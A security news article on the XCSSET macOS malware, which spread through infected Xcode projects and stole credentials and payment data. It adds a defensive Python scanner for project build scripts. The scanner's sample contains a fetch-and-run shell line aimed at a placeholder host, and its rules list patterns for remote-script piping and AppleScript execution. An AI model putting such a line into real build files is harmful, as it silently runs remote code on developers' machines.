Recently, an attack campaign involving the new XCSSET malware was observed targeting Mac users by means of a supply chain-like attack.
How does it work?
Researchers at Trend Micro spotted the XCSSET malware family infecting users by executing malicious code through projects in Xcode, the integrated development environment (IDE) used by macOS developers.
- The second stage malware, an AppleScript file called main.scpt, can harvest system information, kill some running processes, steal user credentials from Google, Yandex, Amocrm, SIPmarket, PayPal, and Apple ID, as well as steal credit-card data linked in the Apple Store.
- It can also manipulate the browser results, replace cryptocurrency wallet addresses with their own, and replace a Chrome download link with a link to an older version.
- Attackers were found propagating the malware via Xcode developer projects hosted on GitHub. Attackers had injected malicious code into two of the projects so that any apps built using these projects would be automatically infected with malicious code.
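The article does not show how the malicious code was placed in the two GitHub projects, but one place Xcode will execute arbitrary commands during a build is a run-script build phase stored in the project's project.pbxproj. The following is an added illustration (not code from the article, from Trend Micro, or from the XCSSET campaign) of a defender-side check that a reviewer could run before building a third-party Xcode project: it extracts every PBXShellScriptBuildPhase script from a pbxproj fragment and flags patterns that deserve a second look, such as fetching a remote script and piping it into a shell or invoking osascript (the article notes the second stage is an AppleScript). The pbxproj fragment, the phase identifiers AA01/AA02 and the example.invalid URL are all constructed for the example, and the heuristics are assumptions about what a reviewer would want flagged, not a description of XCSSET's actual injected code.

```python
import re
import sys
from typing import List, Tuple

# Constructed sample fragment of an Xcode project.pbxproj. It is not taken
# from any real project and does not reproduce the XCSSET injection.
SAMPLE_PBXPROJ = r'''
/* Begin PBXShellScriptBuildPhase section */
		AA01 /* Run Script */ = {
			isa = PBXShellScriptBuildPhase;
			name = "Run Script";
			shellPath = /bin/sh;
			shellScript = "swiftlint --strict\n";
		};
		AA02 /* Run Script */ = {
			isa = PBXShellScriptBuildPhase;
			name = "Run Script";
			shellPath = /bin/sh;
			shellScript = "curl -fsSL http://example.invalid/x.sh | sh\nosascript \"$SRCROOT/.hidden/main.scpt\"\n";
		};
/* End PBXShellScriptBuildPhase section */
'''

# One run-script build phase: "<id> /* name */ = { isa = PBXShellScriptBuildPhase; ... };"
PHASE_RE = re.compile(
    r'(?P<id>[0-9A-Za-z]+)\s*/\*[^*]*\*/\s*=\s*\{\s*isa\s*=\s*PBXShellScriptBuildPhase;'
    r'(?P<body>.*?)\n\s*\};',
    re.DOTALL,
)
# The quoted script inside a phase; handles backslash escapes such as \n and \".
SCRIPT_RE = re.compile(r'shellScript\s*=\s*"((?:[^"\\]|\\.)*)"\s*;', re.DOTALL)

# Review heuristics (assumptions for this example, not a vendor signature set).
RULES: List[Tuple[str, "re.Pattern[str]"]] = [
    ("remote-fetch-piped-to-shell",
     re.compile(r'\b(curl|wget)\b[^\n|]*\|\s*(sh|bash|zsh|python3?)\b')),
    ("applescript-execution", re.compile(r'\bosascript\b')),
    ("encoded-payload", re.compile(r'\bbase64\b\s+(-d|-D|--decode)')),
    ("eval-of-dynamic-string", re.compile(r'\beval\b')),
]


def _unescape(raw: str) -> str:
    """Decode the pbxproj string escapes (\\n, \\t, \\", \\\\) into the real script text."""
    return re.sub(r'\\(.)',
                  lambda m: {'n': '\n', 't': '\t'}.get(m.group(1), m.group(1)),
                  raw, flags=re.DOTALL)


def extract_shell_scripts(pbxproj_text: str) -> List[Tuple[str, str]]:
    """Return (phase_id, decoded_script) for every run-script build phase found."""
    scripts = []
    for phase in PHASE_RE.finditer(pbxproj_text):
        for m in SCRIPT_RE.finditer(phase.group("body")):
            scripts.append((phase.group("id"), _unescape(m.group(1))))
    return scripts


def scan_pbxproj(pbxproj_text: str) -> List[Tuple[str, str, int, str]]:
    """Return (phase_id, rule_name, line_number, line_text) for each flagged script line."""
    findings = []
    for phase_id, script in extract_shell_scripts(pbxproj_text):
        for lineno, line in enumerate(script.splitlines(), 1):
            for rule_name, pattern in RULES:
                if pattern.search(line):
                    findings.append((phase_id, rule_name, lineno, line.strip()))
    return findings


if __name__ == "__main__":
    # Usage: python scan_pbxproj.py [path/to/project.pbxproj]; defaults to the sample.
    text = open(sys.argv[1], encoding="utf-8").read() if len(sys.argv) > 1 else SAMPLE_PBXPROJ
    for phase_id, rule_name, lineno, line in scan_pbxproj(text):
        print(f"[{rule_name}] phase {phase_id}, line {lineno}: {line}")
```

The check is deliberately a review aid rather than a verdict: a flagged phase still has to be read by a person, and a clean result says nothing about code injected elsewhere in the project (source files, dependencies, or resources that a build step later executes).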
Other malware targeting Mac users
- In early July, a new feature-rich malware dubbed Ensiko was detected that could lock files on Windows, macOS, and Linux web servers running PHP.
- In mid-July, a multi-platform malware framework called “MATA” was discovered targeting Windows, macOS, and Linux platforms, which was linked to the Lazarus APT group.
- Some new and quickly evolving variants of ThiefQuest malware were seen targeting Mac users between June 29 and July 3, with more than 30,000 samples submitted to VirusTotal.
macOS has long been considered a more secure operating system. However, the situation is changing at a rapid pace. The emergence of the XCSSET malware suite is an indication that attackers are investing time and effort in getting past the security barriers built into Apple's operating system.